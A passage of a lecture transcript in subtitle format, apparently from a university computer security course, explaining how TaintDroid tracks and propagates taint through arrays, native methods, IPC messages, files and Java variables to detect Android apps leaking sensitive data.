You basically take
all of the bits that

429
00:20:10,320 --> 00:20:12,970
are saying either one of
those and then assign that

430
00:20:12,970 --> 00:20:15,444
to that throwback to this one.

431
00:20:15,444 --> 00:20:16,610
AUDIENCE: All right, thanks.

432
00:20:16,610 --> 00:20:17,776
PROFESSOR: Yeah, no problem.

433
00:20:17,776 --> 00:20:20,940
And so one reasons, so once
again I should emphasize this,

434
00:20:20,940 --> 00:20:24,390
so since we can represent all
the possible taints in this 32

435
00:20:24,390 --> 00:20:26,590
bits, as we were
just discussing,

436
00:20:26,590 --> 00:20:28,999
doing this operation here,
it's just bitwise operations.

437
00:20:28,999 --> 00:20:31,040
So this actually really
cuts down on the overhead

438
00:20:31,040 --> 00:20:32,500
from implementing
these taint bits.

439
00:20:32,500 --> 00:20:35,160
If you had to express a
larger universe of taints then

440
00:20:35,160 --> 00:20:37,076
you might be in trouble,
because you might not

441
00:20:37,076 --> 00:20:39,070
be able to use these
very efficient bitwise

442
00:20:39,070 --> 00:20:41,440
operations to do things.

443
00:20:41,440 --> 00:20:44,051
Any other questions about that?

444
00:20:44,051 --> 00:20:44,550
OK.

445
00:20:47,270 --> 00:20:50,212
So the way that arrays work is
a little bit like that binary op

446
00:20:50,212 --> 00:20:50,920
like I mentioned.

447
00:20:50,920 --> 00:20:53,010
So this is going
to get the union

448
00:20:53,010 --> 00:20:56,290
of the taint of this and that.

449
00:20:56,290 --> 00:20:59,950
And so one design decision
that they made in TaintDroid

450
00:20:59,950 --> 00:21:07,741
is that they associate a single
taint tab with each array.

451
00:21:07,741 --> 00:21:09,240
So in other words,
they're not going

452
00:21:09,240 --> 00:21:13,492
to try to taint all the
individual elements in there.

453
00:21:13,492 --> 00:21:14,950
So basically what's
going to end up

454
00:21:14,950 --> 00:21:19,660
happening is that this is going
to save them storage space,

455
00:21:19,660 --> 00:21:21,452
right, because for each
array they declare,

456
00:21:21,452 --> 00:21:23,118
they'll just have a
single through route

457
00:21:23,118 --> 00:21:25,250
to the entity that sort of
floats around that array

458
00:21:25,250 --> 00:21:28,550
and represents all the taint
that belongs to that array.

459
00:21:32,270 --> 00:21:34,170
There is one
question about why is

460
00:21:34,170 --> 00:21:40,010
it safe to not have a finer
grain system for taint.

461
00:21:40,010 --> 00:21:43,110
Because it seems like an
array is a collection of data,

462
00:21:43,110 --> 00:21:45,680
so why shouldn't we have a
bunch of labels flying around

463
00:21:45,680 --> 00:21:48,010
for each thing
that's in that array?

464
00:21:48,010 --> 00:21:51,190
And so the answer to
that is that by only

465
00:21:51,190 --> 00:21:53,380
associating one taint
tag with the array

466
00:21:53,380 --> 00:21:56,910
and making it the union of
all the things that's inside,

467
00:21:56,910 --> 00:22:00,500
that actually is going
to overestimate taint.

468
00:22:00,500 --> 00:22:02,590
So in other words, if
you have an array that

469
00:22:02,590 --> 00:22:04,580
has two items in
it, and that array

470
00:22:04,580 --> 00:22:06,640
is tainted with the union
of all of those things,

471
00:22:06,640 --> 00:22:09,930
well, that's probably a little
bit-- it's conservative.

472
00:22:09,930 --> 00:22:12,270
Because it may be that if
something only accesses this,

473
00:22:12,270 --> 00:22:14,186
maybe it didn't learn
anything about the taint

474
00:22:14,186 --> 00:22:15,070
that was over here.

475
00:22:15,070 --> 00:22:17,720
But by being
conservative, hopefully we

476
00:22:17,720 --> 00:22:19,607
will always be correct.

477
00:22:19,607 --> 00:22:21,065
In other words, if
we underestimate

478
00:22:21,065 --> 00:22:22,620
the amount of taint
that something had,

479
00:22:22,620 --> 00:22:24,540
then we might accidentally
disclose something

480
00:22:24,540 --> 00:22:26,248
that we didn't want
to actually disclose.

481
00:22:26,248 --> 00:22:28,570
But if we overestimate,
then in the worst case,

482
00:22:28,570 --> 00:22:31,700
maybe we prevent something from
going outside of the phone that

483
00:22:31,700 --> 00:22:33,380
should actually
OK, but we're going

484
00:22:33,380 --> 00:22:35,027
to be err on the side of safety.

485
00:22:35,027 --> 00:22:36,110
Does that all makes sense?

486
00:22:38,790 --> 00:22:43,910
Another instance of-- a
sort of special case taint

487
00:22:43,910 --> 00:22:49,825
propagation that they mention
are things like native methods.

488
00:22:54,120 --> 00:22:57,570
And so native methods
might exist inside of the v

489
00:22:57,570 --> 00:23:02,360
in itself, so for example, the
Dalvik VM exposes some function

490
00:23:02,360 --> 00:23:08,120
like a System.arraycopy(), so
we can pass in anything through

491
00:23:08,120 --> 00:23:13,270
this, and internal to the VM,
this is implemented in C or C++

492
00:23:13,270 --> 00:23:15,750
code for reasons of speed.

493
00:23:15,750 --> 00:23:18,510
That's one type of example of
a native method you might have.

494
00:23:18,510 --> 00:23:22,950
Another thing you might
have, a type of native method

495
00:23:22,950 --> 00:23:28,800
is what they call
JNI expose methods.

496
00:23:28,800 --> 00:23:31,310
So the native
interface essentially

497
00:23:31,310 --> 00:23:35,330
allows Java code
to call into code

498
00:23:35,330 --> 00:23:38,492
that is not Java, that's
implemented using x86 or ARM

499
00:23:38,492 --> 00:23:39,450
or something like that.

500
00:23:39,450 --> 00:23:41,350
There's a whole
calling convention

501
00:23:41,350 --> 00:23:43,600
that's exposed here to allow
those two types of stacks

502
00:23:43,600 --> 00:23:45,330
to interoperate.

503
00:23:45,330 --> 00:23:49,460
And so the problem with
these native code methods,

504
00:23:49,460 --> 00:23:52,370
from the perspective
of tracking taint,

505
00:23:52,370 --> 00:23:57,440
is that this native code is
not being executed directly

506
00:23:57,440 --> 00:23:59,540
by the Dalvik interpreter.

507
00:23:59,540 --> 00:24:03,400
In fact, it is often not even
Java code, maybe C or C++ code.

508
00:24:03,400 --> 00:24:06,300
So that means that once
execution flow goes

509
00:24:06,300 --> 00:24:09,020
into one of these
native methods,

510
00:24:09,020 --> 00:24:12,690
TaintDroid can't do any
of this taint propagation

511
00:24:12,690 --> 00:24:17,010
that it's doing for code
that lives in the Java world.

512
00:24:17,010 --> 00:24:18,930
So that seems a
little bit problematic

513
00:24:18,930 --> 00:24:21,630
because these things are
kind of like black boxes.

514
00:24:21,630 --> 00:24:25,360
You want to make sure that
when these methods return,

515
00:24:25,360 --> 00:24:28,640
we can actually
somehow represent

516
00:24:28,640 --> 00:24:30,720
the new taint that was
created by the execution

517
00:24:30,720 --> 00:24:31,690
of those methods.

518
00:24:31,690 --> 00:24:38,490
And so the way that the
authors solve this issue is,

519
00:24:38,490 --> 00:24:42,980
they essentially result
to manual analysis.

520
00:24:46,160 --> 00:24:49,890
So they basically say,
there are not a whole lot

521
00:24:49,890 --> 00:24:51,890
of these types of methods here.

522
00:24:51,890 --> 00:24:55,430
So for example, the Dalvik VM
only exposes a certain number

523
00:24:55,430 --> 00:24:57,290
of functions like
Systems.arraycopy(),

524
00:24:57,290 --> 00:25:00,080
so we as human developers can
look through this relatively

525
00:25:00,080 --> 00:25:03,860
small number of calls and
essentially figure out what

526
00:25:03,860 --> 00:25:05,560
the taint relationship
should be.

527
00:25:05,560 --> 00:25:08,424
So for example, they can look
at something like array copy

528
00:25:08,424 --> 00:25:09,840
and say, OK, based
on what we know

529
00:25:09,840 --> 00:25:11,840
the semantics of
this operation are,

530
00:25:11,840 --> 00:25:13,950
we know that we should
taint the return values

531
00:25:13,950 --> 00:25:15,960
from this function
in a certain way

532
00:25:15,960 --> 00:25:19,660
given the input values
to this function.

533
00:25:19,660 --> 00:25:22,700
And so how well does this scale?

534
00:25:22,700 --> 00:25:25,690
Well, if there are in
fact only a small number

535
00:25:25,690 --> 00:25:30,300
of things exposed by, for
example, the VM in native code,

536
00:25:30,300 --> 00:25:31,960
this actually works OK.

537
00:25:31,960 --> 00:25:34,410
Because if you assume that the
Dalvik VM interface doesn't

538
00:25:34,410 --> 00:25:36,640
change very often,
then it's actually not

539
00:25:36,640 --> 00:25:39,300
too burdensome to look at these
things, view the documentation,

540
00:25:39,300 --> 00:25:43,350
and figure out how
taint's going to spread.

541
00:25:43,350 --> 00:25:46,541
This may or may not
be more troublesome.

542
00:25:46,541 --> 00:25:48,790
They give some empirical
data that suggests that a lot

543
00:25:48,790 --> 00:25:51,100
of applications
are not, in fact,

544
00:25:51,100 --> 00:25:56,075
including code alongside of
them that's actually going

545
00:25:56,075 --> 00:25:58,307
to execute in C or C++.

546
00:25:58,307 --> 00:26:00,140
So they argued that
empirically, this is not

547
00:26:00,140 --> 00:26:01,223
going to be a big problem.

548
00:26:01,223 --> 00:26:05,840
They also argue that for certain
types of method signatures,

549
00:26:05,840 --> 00:26:09,900
you can actually automate
the way in which these taint

550
00:26:09,900 --> 00:26:11,160
calculations are done.

551
00:26:11,160 --> 00:26:14,210
So they say that, for example,
if only integers or strings are

552
00:26:14,210 --> 00:26:17,000
pass in to some of these
native functions here, then

553
00:26:17,000 --> 00:26:20,150
we can just do the standard
thing of tagging the output

554
00:26:20,150 --> 00:26:23,389
value with the union of all
things the taints of the input.

555
00:26:23,389 --> 00:26:25,430
So in practice, it seems
like this isn't probably

556
00:26:25,430 --> 00:26:27,315
going to be too big
of a problem here.

557
00:26:27,315 --> 00:26:30,780
AUDIENCE: But why couldn't
you just scan-- whatever

558
00:26:30,780 --> 00:26:33,750
scans your code [INAUDIBLE]?

559
00:26:36,720 --> 00:26:39,610
PROFESSOR: Oh yeah, so in
practice, what do they do.

560
00:26:39,610 --> 00:26:43,610
So they know that whenever the
interpreter is going to execute

561
00:26:43,610 --> 00:26:46,410
something like this, then when
the return value comes back,

562
00:26:46,410 --> 00:26:49,130
they do have special case code
that's going to automagically

563
00:26:49,130 --> 00:26:52,750
say return values of
System.arraycopy() should have

564
00:26:52,750 --> 00:26:54,149
this taint assigned to it.

565
00:26:54,149 --> 00:26:56,190
AUDIENCE: Right, so what's
the manual part of it?

566
00:26:56,190 --> 00:26:57,545
PROFESSOR: Oh, the
manual part of it

567
00:26:57,545 --> 00:27:00,260
is figuring out what that policy
should be in the first place.

568
00:27:00,260 --> 00:27:03,450
So in other words, if you
just look at off the shelf

569
00:27:03,450 --> 00:27:05,255
Taint or off the
shelf Android, this

570
00:27:05,255 --> 00:27:06,630
is going to do
something for you,

571
00:27:06,630 --> 00:27:08,380
but it's not going to
automatically assign

572
00:27:08,380 --> 00:27:09,630
Taint in the right way.

573
00:27:09,630 --> 00:27:11,130
So someone looks
at this and figures

574
00:27:11,130 --> 00:27:12,990
out what that policy is.

575
00:27:12,990 --> 00:27:13,490
Make sense?

576
00:27:13,490 --> 00:27:15,584
Any other questions?

577
00:27:15,584 --> 00:27:17,000
It doesn't look
like this is going

578
00:27:17,000 --> 00:27:23,210
to be a big problem in practice,
although you can imagine that,

579
00:27:23,210 --> 00:27:26,120
for example, if there
was this increasing

580
00:27:26,120 --> 00:27:29,280
amount of applications that
define these native outcalls,

581
00:27:29,280 --> 00:27:32,841
then we could be in a
little bit of a problem.

582
00:27:32,841 --> 00:27:33,340
All right.

583
00:27:38,790 --> 00:27:42,780
So another type of
data that we have

584
00:27:42,780 --> 00:27:49,290
to worry about assigning
taint to, IPC messages.

585
00:27:49,290 --> 00:27:53,257
And so IPC messages
are essentially

586
00:27:53,257 --> 00:27:54,090
treated like arrays.

587
00:27:56,610 --> 00:28:01,790
So each one of these
messages is going

588
00:28:01,790 --> 00:28:04,310
to be associated with
a single taint that

589
00:28:04,310 --> 00:28:08,230
is the union of the taint of
all the constituent parts.

590
00:28:08,230 --> 00:28:09,900
Once again, this
helps with efficiency

591
00:28:09,900 --> 00:28:13,140
because we only have
to store one taint tag

592
00:28:13,140 --> 00:28:15,360
for each one of these messages.

593
00:28:15,360 --> 00:28:17,860
And in the worst case,
this is conservative,

594
00:28:17,860 --> 00:28:19,170
it overestimates taint.

595
00:28:19,170 --> 00:28:21,727
But that should never
result in a security leak.

596
00:28:21,727 --> 00:28:23,560
At worst, it should
only result in something

597
00:28:23,560 --> 00:28:25,650
that should have been able to
go over the network not being

598
00:28:25,650 --> 00:28:27,030
able to go on the network.

599
00:28:30,110 --> 00:28:32,730
This is how things work
when you're constructing

600
00:28:32,730 --> 00:28:34,800
the message, so
that message gets

601
00:28:34,800 --> 00:28:36,880
the union of all the
taint of its components.

602
00:28:36,880 --> 00:28:40,570
Then when you're
reading it, what you

603
00:28:40,570 --> 00:28:46,500
receive in the message--
so extracted data

604
00:28:46,500 --> 00:28:52,560
gets the taint of the message
itself, which makes sense.

605
00:28:55,240 --> 00:28:57,200
So that's how IPC
messages are treated.

606
00:28:57,200 --> 00:29:03,000
Another resource you might worry
about is how a file's handled.

607
00:29:03,000 --> 00:29:10,160
So once again each file
gets a single taint tag,

608
00:29:10,160 --> 00:29:11,770
and that tag is
essentially stored

609
00:29:11,770 --> 00:29:14,970
alongside the file in its
metadata on stable stores

610
00:29:14,970 --> 00:29:17,219
like the SD card or whatever.

611
00:29:17,219 --> 00:29:19,260
So this is basically the
same conservative scheme

612
00:29:19,260 --> 00:29:20,360
that we've seen before.

613
00:29:20,360 --> 00:29:25,030
So the basic idea is that
the application accesses

614
00:29:25,030 --> 00:29:27,090
some sensitive data like,
for example, your GPS

615
00:29:27,090 --> 00:29:31,710
location, maybe it's going
to write that data to a file.

616
00:29:31,710 --> 00:29:34,730
So TaintDroid updates
that file's taint tag

617
00:29:34,730 --> 00:29:38,700
with the GPS flag, maybe
the application closes down,

618
00:29:38,700 --> 00:29:42,940
later on some other application
comes out, it reads that file.

619
00:29:42,940 --> 00:29:46,700
When it comes into the
VM, into the application,

620
00:29:46,700 --> 00:29:48,200
TaintDroid will
look and see that it

621
00:29:48,200 --> 00:29:52,150
has that flag marked,
and so any data that's

622
00:29:52,150 --> 00:29:55,550
derived from reading that file
will also have that GPS flag

623
00:29:55,550 --> 00:29:56,240
set.

624
00:29:56,240 --> 00:29:59,590
So pretty
straightforward, I think.

625
00:29:59,590 --> 00:30:04,410
So what kind of
things do we have

626
00:30:04,410 --> 00:30:07,170
to taint in terms of Java State.

627
00:30:07,170 --> 00:30:15,990
So there's basically five
types of Java objects

628
00:30:15,990 --> 00:30:19,570
that need taint flags.

629
00:30:23,190 --> 00:30:31,330
And so the first kind of
thing is local variables

630
00:30:31,330 --> 00:30:34,370
that live in a method.

631
00:30:34,370 --> 00:30:37,430
So we can imagine
back over here,

632
00:30:37,430 --> 00:30:40,110
this is a local variable,
char c, for example.

633
00:30:40,110 --> 00:30:44,560
So we have to assign taint
flags to those things.

634
00:30:44,560 --> 00:30:50,560
You can also imagine
that method arguments

635
00:30:50,560 --> 00:30:52,440
need to have taint flags.

636
00:30:52,440 --> 00:30:59,030
Both of these things here,
these live in a stack.

637
00:31:03,280 --> 00:31:06,090
So a TaintDroid has to keep
track of assigning flags

638
00:31:06,090 --> 00:31:08,070
and whatnot for those
types of things.

639
00:31:08,070 --> 00:31:15,460
Also we need to assign flags
to object instance fields.

640
00:31:19,980 --> 00:31:24,670
And so this is like, imagine
that I have some object called

641
00:31:24,670 --> 00:31:28,166
c, it's a circle so of
course the proper thing to do

642
00:31:28,166 --> 00:31:29,730
is I want to look at its radius.

643
00:31:29,730 --> 00:31:31,520
Here's a field here.

644
00:31:31,520 --> 00:31:36,690
And so we have to associate
taint information for each one

645
00:31:36,690 --> 00:31:39,030
of these fields here.

646
00:31:39,030 --> 00:31:46,660
Java also allows you to
have a static class field,

647
00:31:46,660 --> 00:31:50,300
and so you need taint
information for those.

648
00:31:50,300 --> 00:31:56,030
This is saying something like,
for example, maybe the circle

649
00:31:56,030 --> 00:31:59,200
that some property, OK,
we'll assign some taint

650
00:31:59,200 --> 00:32:00,530
information there.

651
00:32:00,530 --> 00:32:04,080
Then arrays, as we've
already discussed before,

652
00:32:04,080 --> 00:32:07,750
we'll assign one piece
of taint information

653
00:32:07,750 --> 00:32:09,350
per that entire array.

654
00:32:09,350 --> 00:32:12,030
And so the basic
idea for how we're

655
00:32:12,030 --> 00:32:15,450
going to store these taint flags
at the implementation level,

656
00:32:15,450 --> 00:32:21,887
is that we're going to try
to basically store the taint

657
00:32:21,887 --> 00:32:27,560
flags for a variable
near the variable itself.

658
00:32:33,620 --> 00:32:38,170
The basic idea here is
we've got, for example,

659
00:32:38,170 --> 00:32:40,070
let's say some integer
variable, and we

660
00:32:40,070 --> 00:32:42,740
want to store some
taint state with that.

661
00:32:42,740 --> 00:32:45,430
We want to try to keep that
state as close to the variable

662
00:32:45,430 --> 00:32:47,660
as possible for reasons
of making the cache

663
00:32:47,660 --> 00:32:50,420
work efficiently at
the processor level.

664
00:32:50,420 --> 00:32:52,790
So if we were to
store taint very far

665
00:32:52,790 --> 00:32:54,376
away from that
variable, that can

666
00:32:54,376 --> 00:32:56,640
be problematic because
probably, the interpreter

667
00:32:56,640 --> 00:32:59,250
is going to look at the memory
value for the actual Java

668
00:32:59,250 --> 00:32:59,860
variable.

669
00:32:59,860 --> 00:33:02,310
It's going to want to very
quickly thereafter, or even

670
00:33:02,310 --> 00:33:04,990
before that, look and see
what the taint information is.

671
00:33:04,990 --> 00:33:09,566
Because if you look at
these operations here,

672
00:33:09,566 --> 00:33:10,940
the same places
in the code where

673
00:33:10,940 --> 00:33:12,280
the interpreter's
looking at the values,

674
00:33:12,280 --> 00:33:13,710
it's also looking at taint.

675
00:33:13,710 --> 00:33:17,710
Basically by storing these
things close to each other,

676
00:33:17,710 --> 00:33:19,880
you try to make the
cache behavior better.

677
00:33:19,880 --> 00:33:22,840
And the way that they
do this is actually

678
00:33:22,840 --> 00:33:25,520
pretty straightforward.

679
00:33:25,520 --> 00:33:30,660
So if you look at what they
do for method arguments

680
00:33:30,660 --> 00:33:32,500
and local variables
that live on a stack,

681
00:33:32,500 --> 00:33:36,390
they essentially
allocate the taint flags

682
00:33:36,390 --> 00:33:39,330
right next to where the
variables are allocated.

683
00:33:39,330 --> 00:33:44,860
So let's say that we have our
favorite thing in this class,

684
00:33:44,860 --> 00:33:47,360
a stack diagram,
which you'll probably

685
00:33:47,360 --> 00:33:49,110
hate after you get out of here.

686
00:33:49,110 --> 00:33:56,740
So you've got some local
variable 0 on the stack,

687
00:33:56,740 --> 00:33:59,220
and then what
TaintDroid will do is

688
00:33:59,220 --> 00:34:02,270
it will store the taint
tag for that variable

689
00:34:02,270 --> 00:34:05,540
right next to where that
local variable is in memory.

690
00:34:05,540 --> 00:34:10,810
So similarly, if you had
another local variable here,

691
00:34:10,810 --> 00:34:16,900
then you would see its
taint tag right down here.

692
00:34:16,900 --> 00:34:19,362
So on and so forth.

693
00:34:19,362 --> 00:34:20,320
Pretty straightforward.

694
00:34:20,320 --> 00:34:22,567
So hopefully you
get these things

695
00:34:22,567 --> 00:34:25,150
in the same cache line, that's
going to make the accesses very

696
00:34:25,150 --> 00:34:25,671
cheap.

697
00:34:25,671 --> 00:34:26,170
Yeah?

698
00:34:26,170 --> 00:34:28,094
AUDIENCE: I was just
wondering, how can you

699
00:34:28,094 --> 00:34:30,350
have a single flag
for an entire array

700
00:34:30,350 --> 00:34:33,810
and a different flag for
every property of an object.

701
00:34:33,810 --> 00:34:38,080
What if one of the
methods of the object

702
00:34:38,080 --> 00:34:41,023
can access data which is
stored in its properties.

703
00:34:41,023 --> 00:34:42,895
That would like--
know what I mean?

704
00:34:42,895 --> 00:34:44,190
PROFESSOR: Let's see.

705
00:34:44,190 --> 00:34:47,030
So you're asking as
a policy reason, why?

706
00:34:47,030 --> 00:34:48,530
AUDIENCE: As a
policy reason, right.

707
00:34:48,530 --> 00:34:51,840
PROFESSOR: So I think some of
this they do for implementation

708
00:34:51,840 --> 00:34:53,489
efficiency reasons.

709
00:34:53,489 --> 00:34:56,530
I think that for the case--
so they have some other rules,

710
00:34:56,530 --> 00:34:57,030
too.

711
00:34:57,030 --> 00:35:00,232
For example, they say that they
don't say a length of the data

712
00:35:00,232 --> 00:35:02,750
array, is actually going
to leak information,

713
00:35:02,750 --> 00:35:04,700
so they don't propagate
taint for that.

714
00:35:04,700 --> 00:35:07,000
So some of it is just for
reasons of efficiency.

715
00:35:07,000 --> 00:35:09,820
I think that in principle, that
there's nothing that stops you

716
00:35:09,820 --> 00:35:14,450
from saying, take every
element in the array

717
00:35:14,450 --> 00:35:16,636
and, when you do some
particular access on it,

718
00:35:16,636 --> 00:35:18,760
then you just say the thing
on the left hand side's

719
00:35:18,760 --> 00:35:21,741
going to get the
taint, only that items.

720
00:35:21,741 --> 00:35:23,740
It's not completely clear
that's the right thing

721
00:35:23,740 --> 00:35:25,910
to do, though,
because presumably

722
00:35:25,910 --> 00:35:28,980
in getting that thing into
the array in the first place,

723
00:35:28,980 --> 00:35:30,930
the thing that did that
had to know something

724
00:35:30,930 --> 00:35:32,851
about the array in some way.

725
00:35:32,851 --> 00:35:35,100
So I think it's a combination
of both policy reasons--

726
00:35:35,100 --> 00:35:38,060
they think that by being
overly conservative,

727
00:35:38,060 --> 00:35:42,200
you shouldn't allow any data
leaks that you want to prevent.

728
00:35:42,200 --> 00:35:44,740
And also I think that it
kind of does intuitively

729
00:35:44,740 --> 00:35:47,035
make sense that
accessing an array,

730
00:35:47,035 --> 00:35:49,160
you should have to know
something about that array.

731
00:35:49,160 --> 00:35:50,740
And when you have to know
something about something,

732
00:35:50,740 --> 00:35:52,948
that typically means that
you want to get tainted by.

733
00:35:54,810 --> 00:35:57,210
Any other questions?

734
00:35:57,210 --> 00:35:59,425
OK, so this is the
basic scheme that they

735
00:35:59,425 --> 00:36:02,830
use for essentially storing
all of this information close

736
00:36:02,830 --> 00:36:03,500
to each other.

737
00:36:03,500 --> 00:36:05,300
So you can imagine
that for class fields

738
00:36:05,300 --> 00:36:07,440
and for object fields,
you do a similar thing.

739
00:36:07,440 --> 00:36:09,280
So in the declaration
of the class,

740
00:36:09,280 --> 00:36:12,580
you've got some slot memory for
a particular instance variable,

741
00:36:12,580 --> 00:36:14,530
and then right next
to that slot you

742
00:36:14,530 --> 00:36:18,660
have the taint information
for that particular variable.

743
00:36:18,660 --> 00:36:21,380
So I think that's all
pretty reasonable.

744
00:36:22,860 --> 00:36:26,780
That's kind of a high level
overview of how TaintDroid

745
00:36:26,780 --> 00:36:30,990
works, so if you get all
this, then the basic idea

746
00:36:30,990 --> 00:36:33,900
behind TaintDroid is
actually pretty simple.

747
00:36:33,900 --> 00:36:37,900
So at system initialization
time or whatever,

748
00:36:37,900 --> 00:36:41,660
TaintDroid looks at all these
sources of potentially tainted

749
00:36:41,660 --> 00:36:43,880
information, and
essentially assigns a flag

750
00:36:43,880 --> 00:36:45,046
to each one of these things.

751
00:36:45,046 --> 00:36:47,940
So things like your GPS, your
camera, and so on and so forth.

752
00:36:47,940 --> 00:36:50,243
As the program
executes, it's going

753
00:36:50,243 --> 00:36:51,670
to pull out
sensitive information

754
00:36:51,670 --> 00:36:54,720
from these sensitive sources,
and then as that kind of thing

755
00:36:54,720 --> 00:36:56,460
happens, the
interpreter is going

756
00:36:56,460 --> 00:36:58,043
to look at all these
types of op codes

757
00:36:58,043 --> 00:37:01,640
here and basically
follow those policy

758
00:37:01,640 --> 00:37:03,653
rules in the table on
the paper, and figure out

759
00:37:03,653 --> 00:37:06,780
how to propagate taint
through the system.

760
00:37:06,780 --> 00:37:08,990
So the most interesting
part is what

761
00:37:08,990 --> 00:37:12,570
happens if data attempts
to exfiltrate itself.

762
00:37:12,570 --> 00:37:15,660
So essentially, TaintDroid can
sit at the network interfaces

763
00:37:15,660 --> 00:37:18,320
and they can see everything that
tries to go over the network

764
00:37:18,320 --> 00:37:18,944
interface.

765
00:37:18,944 --> 00:37:20,610
We actually look at
the taint tags there

766
00:37:20,610 --> 00:37:24,520
and we can say if data that's
trying to leave the network

767
00:37:24,520 --> 00:37:29,070
has one or more taint
flags, then we will say no.

768
00:37:29,070 --> 00:37:32,060
That data will not be
allowed to go in the network.

769
00:37:32,060 --> 00:37:35,175
Now what happens at
that point is actually

770
00:37:35,175 --> 00:37:37,090
kind of application-dependent.

771
00:37:37,090 --> 00:37:39,730
You could imagine that
TaintDroid shows an alert

772
00:37:39,730 --> 00:37:41,690
to the user which
says hey, somebody's

773
00:37:41,690 --> 00:37:44,859
trying to send your
location over the network.

774
00:37:44,859 --> 00:37:46,650
You could imagine that
maybe TaintDroid has

775
00:37:46,650 --> 00:37:49,380
some policies that are
built in which, for example,

776
00:37:49,380 --> 00:37:51,390
maybe it allows that
network flow to go out,

777
00:37:51,390 --> 00:37:53,610
but it zeros out all
that sensitive data,

778
00:37:53,610 --> 00:37:54,620
so on and so forth.

779
00:37:54,620 --> 00:37:56,895
That's from a certain
perspective, a little bit

780
00:37:56,895 --> 00:37:57,850
orthogonal to the
core contribution

781
00:37:57,850 --> 00:38:00,250
of the paper, which is to
find those data exfiltrations

782
00:38:00,250 --> 00:38:03,335
in the first place.

783
00:38:03,335 --> 00:38:04,960
In the evaluation
section of the paper,

784
00:38:04,960 --> 00:38:07,240
they discuss some of the
things that they found.

785
00:38:07,240 --> 00:38:10,740
They do find that
Android applications will

786
00:38:10,740 --> 00:38:13,410
try to exfiltrate
data in ways that

787
00:38:13,410 --> 00:38:15,104
were not exposed to the user.

788
00:38:15,104 --> 00:38:17,187
So for example, they will
try to use your location

789
00:38:17,187 --> 00:38:20,090
for advertisements, they
will send your phone number

790
00:38:20,090 --> 00:38:22,080
and things like this
to remote servers.

791
00:38:22,080 --> 00:38:26,170
Once again, it's important to
note that these applications,

792
00:38:26,170 --> 00:38:31,200
typically they weren't
breaking the Android security

793
00:38:31,200 --> 00:38:33,870
model in the sense
that the user had

794
00:38:33,870 --> 00:38:36,350
allowed these applications
with access to the network,

795
00:38:36,350 --> 00:38:37,087
for example.

796
00:38:37,087 --> 00:38:38,670
Or they had allowed
these applications

797
00:38:38,670 --> 00:38:40,760
to have access to things
like a contact list.

798
00:38:40,760 --> 00:38:43,140
However, the
applications did not

799
00:38:43,140 --> 00:38:46,027
exposed to the user in the
EULA, in the End User License

800
00:38:46,027 --> 00:38:48,360
Agreement, that hey, I'm going
to take your phone number

801
00:38:48,360 --> 00:38:52,550
and actually send it to
some server in Silk Road 8

802
00:38:52,550 --> 00:38:54,280
or whatever.

803
00:38:54,280 --> 00:38:57,134
That's actually misleading and
deceptive, because most users,

804
00:38:57,134 --> 00:38:58,800
if they'd actually
seen that in the EULA

805
00:38:58,800 --> 00:39:00,299
and they'd known
that was happening,

806
00:39:00,299 --> 00:39:02,827
they might have at least
had a second thought about

807
00:39:02,827 --> 00:39:05,035
whether they want to install
this application or not.

808
00:39:05,035 --> 00:39:08,915
AUDIENCE: Is it reasonable to
guess that even if they put it

809
00:39:08,915 --> 00:39:10,855
in the EULA, that
that's not really worth

810
00:39:10,855 --> 00:39:12,313
it because people
never read those.

811
00:39:12,313 --> 00:39:14,080
PROFESSOR: Yes, it
is, in fact, quite

812
00:39:14,080 --> 00:39:15,770
reasonable to assume that.

813
00:39:15,770 --> 00:39:17,945
So even well trained computer
scientists like myself

814
00:39:17,945 --> 00:39:19,820
do not always check out
the EULA because it's

815
00:39:19,820 --> 00:39:21,670
like, you gotta
have Flappy Birds

816
00:39:21,670 --> 00:39:23,000
or what are you going to do.

817
00:39:23,000 --> 00:39:25,794
I think what is useful,
though, and this

818
00:39:25,794 --> 00:39:27,710
is kind of spiritually
unsatisfying but useful

819
00:39:27,710 --> 00:39:30,081
in practice, is that if
it is put in the EULA,

820
00:39:30,081 --> 00:39:32,330
then maybe there will be
some virtuous individuals who

821
00:39:32,330 --> 00:39:34,050
do actually read the EULA.

822
00:39:34,050 --> 00:39:34,600
AUDIENCE: And they
could tell you like--

823
00:39:34,600 --> 00:39:35,490
PROFESSOR: That's
right, that's right.

824
00:39:35,490 --> 00:39:35,880
AUDIENCE: --don't do that one.

825
00:39:35,880 --> 00:39:37,960
PROFESSOR: Yeah,
Consumer Reports

826
00:39:37,960 --> 00:39:41,380
or some moral equivalent will
say our job is to read EULAs,

827
00:39:41,380 --> 00:39:43,526
and by the way, you
shouldn't download this app.

828
00:39:43,526 --> 00:39:45,820
But you're exactly correct
that relying on users

829
00:39:45,820 --> 00:39:48,345
to read pages of tiny
print is basically--

830
00:39:48,345 --> 00:39:49,470
they're not going to do it.

831
00:39:49,470 --> 00:39:54,260
They're going to hit Next
and then keep on going.

832
00:39:54,260 --> 00:39:57,500
OK, so any questions
up to this point?

833
00:39:57,500 --> 00:40:02,890
I think that the rules
for how information

834
00:40:02,890 --> 00:40:05,650
flows through the system
are fairly straightforward.

835
00:40:05,650 --> 00:40:07,560
So as we were discussing,
it's basically

836
00:40:07,560 --> 00:40:10,400
taint from the right hand
side goes to the left side.

837
00:40:10,400 --> 00:40:13,010
Sometimes, though, these
information flow rules

838
00:40:13,010 --> 00:40:15,140
can have somewhat
counterintuitive results.

839
00:40:15,140 --> 00:40:17,580
So imagine that
an application is

840
00:40:17,580 --> 00:40:22,120
going to implement its
own linked list class.

841
00:40:22,120 --> 00:40:28,550
So it's going to define some
simple class up here called

842
00:40:28,550 --> 00:40:35,020
ListNode and it's going to
have an object field for data.

843
00:40:35,020 --> 00:40:39,528
And then it will have
a ListNode object

844
00:40:39,528 --> 00:40:46,310
which represents the next
thing in the linked list.

845
00:40:46,310 --> 00:40:50,770
Suppose if the application
assigned some tainted data

846
00:40:50,770 --> 00:40:54,590
to this field here.

847
00:40:54,590 --> 00:40:57,400
Some sensitive data derived
from a GPS or whatever.

848
00:40:57,400 --> 00:40:59,810
So one question
you might have is

849
00:40:59,810 --> 00:41:03,730
what happens when we calculate
the length for this list.

850
00:41:03,730 --> 00:41:08,660
Should the length of
the list be tainted?

851
00:41:08,660 --> 00:41:10,870
It may strike you as
a bit counterintuitive

852
00:41:10,870 --> 00:41:13,920
that the answer is probability
no, at least in the way

853
00:41:13,920 --> 00:41:15,670
that TaintDroid and a
lot of these systems

854
00:41:15,670 --> 00:41:16,980
define information flow.

855
00:41:16,980 --> 00:41:25,530
So what does it mean to add
a node to the linked list.

856
